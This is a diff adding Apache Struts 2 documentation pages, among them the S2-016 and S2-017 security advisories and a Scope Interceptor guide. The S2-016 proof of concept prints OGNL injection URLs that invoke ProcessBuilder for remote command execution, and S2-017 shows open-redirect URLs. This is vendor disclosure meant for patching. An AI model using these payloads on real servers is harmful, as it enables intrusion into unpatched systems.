+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=33293800">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=33293800">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=33293800">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=33293800">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=33293800">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=33293800">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><h2><a shape="rect" name="S2-016-Summary"></a>Summary</h2>
+
+
+<p>A vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution</p>
+
+
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh"> Who should read this </th><td colspan="1" rowspan="1" class="confluenceTd"> All Struts 2 developers and users </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Impact of vulnerability </th><td colspan="1" rowspan="1" class="confluenceTd"> Remote command execution </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Maximum security rating </th><td colspan="1" rowspan="1" class="confluenceTd"> Highly Critical </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Recommendation </th><td colspan="1" rowspan="1" class="confluenceTd"> Developers should immediately upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23151">Struts 2.3.15.1</a> </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Affected Software </th><td colspan="1" rowspan="1" class="confluenceTd"> Struts 2.0.0 - Struts 2.3.15 </td></tr><t
 r><th colspan="1" rowspan="1" class="confluenceTh"> Reporter </th><td colspan="1" rowspan="1" class="confluenceTd"> Takeshi Terada of Mitsui Bussan Secure Directions, Inc. </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> CVE Identifier </th><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" class="external-link" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251" rel="nofollow">CVE-2013-2251</a> </td></tr></tbody></table>
+</div>
+
+
+<h2><a shape="rect" name="S2-016-Problem"></a>Problem</h2>
+
+<p>The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.</p>
+
+<p>In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.</p>
+
+<h2><a shape="rect" name="S2-016-Proofofconcept"></a>Proof of concept</h2>
+
+<p>In the Struts Blank App, open following URLs.</p>
+
+<ol><li>Simple Expression - the parameter names are evaluated as OGNL.
+	<ol><li><div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://host/struts2-blank/example/X.action?action:%25{3*4}]]></script>
+</div></div></li><li><div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}]]></script>
+</div></div></li></ol>
+	</li></ol>
+
+
+<ol><li>Command Execution
+	<ol><li><div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}]]></script>
+</div></div></li><li><div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}]]></script>
+</div></div></li><li><div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}]]></script>
+</div></div></li></ol>
+	</li></ol>
+
+
+<h2><a shape="rect" name="S2-016-Solution"></a>Solution</h2>
+
+<p>DefaultActionMapper was changed to sanitize "action:"-prefixed information properly. The features involved with "redirect:"/"redirectAction:"-prefixed parameters were completely dropped - see also <a shape="rect" href="s2-017.html" title="S2-017">S2-017</a>.</p>
+
+<div class="panelMacro"><table class="warningMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1"><b>It is strongly recommended to upgrade to</b> <b><a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23151">Struts 2.3.15.1</a></b><b>, which contains the corrected Struts2-Core library.</b></td></tr></table></div></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/s2-017.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-017.html (added)
+++ websites/production/struts/content/development/2.x/docs/s2-017.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,181 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>S2-017</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-017.html">S2-017</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-017</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=33293806">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=33293806">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=33293806">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=33293806">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=33293806">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=33293806">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><h2><a shape="rect" name="S2-017-Summary"></a>Summary</h2>
+
+
+<p>A vulnerability introduced by manipulating parameters prefixed with "redirect:"/"redirectAction:" allows for open redirects</p>
+
+
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh"> Who should read this </th><td colspan="1" rowspan="1" class="confluenceTd"> All Struts 2 developers and users </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Impact of vulnerability </th><td colspan="1" rowspan="1" class="confluenceTd"> Open redirect </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Maximum security rating </th><td colspan="1" rowspan="1" class="confluenceTd"> Important</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Recommendation </th><td colspan="1" rowspan="1" class="confluenceTd"> Developers should immediately upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23151">Struts 2.3.15.1</a> </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Affected Software </th><td colspan="1" rowspan="1" class="confluenceTd"> Struts 2.0.0 - Struts 2.3.15 </td></tr><tr><th colspan="1" 
 rowspan="1" class="confluenceTh"> Reporter </th><td colspan="1" rowspan="1" class="confluenceTd"> Takeshi Terada of Mitsui Bussan Secure Directions, Inc. </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> CVE Identifier </th><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" class="external-link" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2248" rel="nofollow">CVE-2013-2248</a> </td></tr></tbody></table>
+</div>
+
+
+<h2><a shape="rect" name="S2-017-Problem"></a>Problem</h2>
+
+<p>The Struts 2 DefaultActionMapper used to support a method for short-circuit navigation state changes by prefixing parameters with "redirect:" or "redirectAction:", followed by a desired redirect target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.</p>
+
+<p>In Struts 2 before 2.3.15.1 the information following "redirect:" or "redirectAction:" can easily be manipulated to redirect to an arbitrary location.</p>
+
+<h2><a shape="rect" name="S2-017-Proofofconcept"></a>Proof of concept</h2>
+
+<p>In the Struts Showcase App, open following URLs.</p>
+
+<ol><li><div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/]]></script>
+</div></div></li><li><div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23]]></script>
+</div></div></li></ol>
+
+
+<h2><a shape="rect" name="S2-017-Solution"></a>Solution</h2>
+
+<p>DefaultActionMapper was changed to drop the features involved with "redirect:"/"redirectAction:"-prefixed parameters completely - see also <a shape="rect" href="s2-016.html" title="S2-016">S2-016</a>.</p>
+
+<div class="panelMacro"><table class="noteMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1"><b>Backward Compatibility</b><br clear="none">After upgrading to Struts &gt;= 2.3.15.1, applications using the "redirect:" / "redirectAction:" functionality will no longer work properly. Please investigate your code to replace such expressions with proper fixed navigation rules.</td></tr></table></div>
+
+<div class="panelMacro"><table class="warningMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1"><b>It is strongly recommended to upgrade to</b> <b><a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23151">Struts 2.3.15.1</a></b><b>, which contains the corrected Struts2-Core library.</b></td></tr></table></div></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/scope-interceptor.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/scope-interceptor.html (added)
+++ websites/production/struts/content/development/2.x/docs/scope-interceptor.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,236 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>Scope Interceptor</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="guides.html">Guides</a>&nbsp;&gt;&nbsp;<a href="core-developers-guide.html">Core Developers Guide</a>&nbsp;&gt;&nbsp;<a href="interceptors.html">Interceptors</a>&nbsp;&gt;&nbsp;<a href="scope-interceptor.html">Scope Interceptor</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">Scope Interceptor</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=13932">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=13932">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=13932">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=13932">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=13932">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=13932">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent">
+<p>This is designed to solve a few simple issues related to wizard-like functionality in Struts. One of those issues is
+that some applications have a application-wide parameters commonly used, such <i>pageLen</i> (used for records per
+page). Rather than requiring that each action check if such parameters are supplied, this interceptor can look for
+specified parameters and pull them out of the session.</p>
+
+<p></p><p></p> This works by setting listed properties at action start with values from session/application attributes keyed
+after the action's class, the action's name, or any supplied key. After action is executed all the listed properties
+are taken back and put in session or application context.
+
+<p></p><p></p> To make sure that each execution of the action is consistent it makes use of session-level locking. This way it
+guarantees that each action execution is atomic at the session level. It doesn't guarantee application level
+consistency however there has yet to be enough reasons to do so. Application level consistency would also be a big
+performance overkill.
+
+<p></p><p></p> Note that this interceptor takes a snapshot of action properties just before result is presented (using a {@link
+PreResultListener}), rather than after action is invoked. There is a reason for that: At this moment we know that
+action's state is "complete" as it's values may depend on the rest of the stack and specifically - on the values of
+nested interceptors.
+
+
+<h2><a shape="rect" name="ScopeInterceptor-Parameters"></a>Parameters</h2>
+
+
+<p></p><ul></ul><p></p><ul><li>session - a list of action properties to be bound to session scope</li></ul><p></p><ul><li>application - a list of action properties to be bound to application scope</li></ul><p></p><ul><li>key - a session/application attribute key prefix, can contain following values:</li></ul><p></p><ul></ul><p></p><ul><li>CLASS - that creates a unique key prefix based on action namespace and action class, it's a default value</li></ul><p></p><ul><li>ACTION - creates a unique key prefix based on action namespace and action name</li></ul><p></p><ul><li>any other value is taken literally as key prefix</li></ul><p></p>
+
+<p></p><ul><li>type - with one of the following</li></ul><p></p><ul></ul><p></p><ul><li>start - means it's a start action of the wizard-like action sequence and all session scoped properties are reset
+to their defaults</li></ul><p></p><ul><li>end - means that session scoped properties are removed from session after action is run</li></ul><p></p><ul><li>any other value throws IllegalArgumentException</li></ul><p></p>
+
+<p></p><ul><li>sessionReset - name of a parameter (defaults to 'session.reset') which if set, causes all session values to be reset to action's default values or application
+scope values, note that it is similar to type="start" and in fact it does the same, but in our team it is sometimes
+semantically preferred. We use session scope in two patterns - sometimes there are wizard-like action sequences that
+have start and end, and sometimes we just want simply reset current session values.</li></ul><p></p><ul><li>reset - boolean, defaults to false, if set, it has the same effect as setting all session values to be reset to action's default values or application.</li></ul><p></p><ul><li>autoCreateSession - boolean value, sets if the session should be automatically created.</li></ul>
+
+
+<h2><a shape="rect" name="ScopeInterceptor-ExtendingtheInterceptor"></a>Extending the Interceptor</h2>
+
+
+<p>There are no know extension points for this interceptor.</p>
+
+
+<h2><a shape="rect" name="ScopeInterceptor-Examples"></a>Examples</h2>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;!-- As the filter and orderBy parameters are common for all my browse-type actions,
+     you can move control to the scope interceptor. In the session parameter you can list
+     action properties that are going to be automatically managed over session. You can
+     do the same for application-scoped variables--&gt;
+&lt;action name="someAction" class="com.examples.SomeAction"&gt;
+    &lt;interceptor-ref name="basicStack"/&gt;
+    &lt;interceptor-ref name="hibernate"/&gt;
+    &lt;interceptor-ref name="scope"&gt;
+        &lt;param name="session"&gt;filter,orderBy&lt;/param&gt;
+        &lt;param name="autoCreateSession"&gt;true&lt;/param&gt;
+    &lt;/interceptor-ref&gt;
+    &lt;result name="success"&gt;good_result.ftl&lt;/result&gt;
+&lt;/action&gt;
+]]></script>
+</div></div>
+
+<h3><a shape="rect" name="ScopeInterceptor-Somemoreexamples"></a>Some more examples</h3>
+
+<p>The scope interceptor can be used to pass arbitrary objects from one action ActionA to another other ActionB, provided you have a getter in ActionA and and a similar setter in actionB. Also, you should use a key parameter to make sure you tell ASF/WW which action gets which objects. This allows you to mix several actions with several scopes, without running the risk of getting wrong objects.</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+    		&lt;action name="scopea" class="com.mevipro.test.action.ScopeActionA"&gt;
+			&lt;result name="success" type="dispatcher"&gt;/jsp/test.jsp&lt;/result&gt;
+			&lt;interceptor-ref name="basicStack"/&gt;
+			&lt;interceptor-ref name="scope"&gt;
+				&lt;param name="key"&gt;funky&lt;/param&gt;
+        		&lt;param name="session"&gt;person&lt;/param&gt;
+        		&lt;param name="autoCreateSession"&gt;true&lt;/param&gt;
+    		&lt;/interceptor-ref&gt;
+		&lt;/action&gt;
+		&lt;action name="scopeb" class="com.mevipro.test.action.ScopeActionB"&gt;
+			&lt;result name="success" type="dispatcher"&gt;/jsp/test.jsp&lt;/result&gt;
+			&lt;interceptor-ref name="scope"&gt;
+				&lt;param name="key"&gt;funky&lt;/param&gt;
+        		&lt;param name="session"&gt;person&lt;/param&gt;
+        		&lt;param name="autoCreateSession"&gt;true&lt;/param&gt;
+    		&lt;/interceptor-ref&gt;
+			&lt;interceptor-ref name="basicStack"/&gt;
+		&lt;/action&gt;
+]]></script>
+</div></div>
+
+<p>Don't forget: you'll need at least a getPerson() getter in ScopeActionA and a setPerson(Person person) setter in ScopeActionB, &#195;&#161;nd you need to make sure you specify the key (you don't need this if you only use one action, as in the example above). Without the key, the scope interceptor will store your variables, but won't set them on the other action.</p></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/scoped-model-driven-interceptor.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/scoped-model-driven-interceptor.html (added)
+++ websites/production/struts/content/development/2.x/docs/scoped-model-driven-interceptor.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,184 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>Scoped Model Driven Interceptor</title>
+</head>
